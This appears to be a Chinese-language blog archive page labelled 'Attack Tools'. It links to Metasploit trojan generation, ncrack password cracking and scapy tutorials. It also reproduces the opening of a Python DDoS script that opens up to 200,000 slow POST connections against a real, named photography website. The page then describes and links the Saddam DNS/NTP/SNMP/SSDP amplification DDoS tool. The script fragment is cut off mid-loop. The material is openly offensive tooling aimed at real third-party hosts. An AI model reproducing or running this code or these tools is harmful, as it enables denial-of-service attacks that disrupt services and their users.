Category Archives: Attack Tools
kali Linux 神器metasploit生成无壳木马 W4rri0r
通过摆弄python scapy模块 了解网络模型–Get your hands dirty! – 知乎
Kali Linux 密码攻击工具 ncrack 教程 – 付杰博客
【Python】实现DDOS攻击脚本_May女子の博客-CSDN博客_ddos强力攻击脚本
#!/usr/bin/env python import socket import time import threading # Pressure Test,ddos tool # ————————— MAX_CONN = 200000 # 最大socket链接量 PORT = 80 HOST = “www.ssyer.com” PAGE = “/photography” # ————————— buf = (“POST %s HTTP/1.1\r\n” “Host: %s\r\n” “Content-Length: 10000000\r\n” “Cookie: dklkt_dos_test\r\n” “\r\n” % (PAGE, HOST)) # 创建socket链接列表,存储上20万个socket socks = [] # 循环创建socket链接 def conn_thread(): global socks for i in range
saddam.py – Google 搜尋
Saddam Plus Plus
DDoS工具支持:*使用ANY,TXT和NS查询进行DNS扩展* NTP放大(网络时间协议)* SNMP放大(简单网络管理协议)* SSDP放大(简单服务发现协议)
https://github.com/OffensivePython/Saddam
https://github.com/S4kur4/Saddam-new
http://www.xmanong.com/project/19468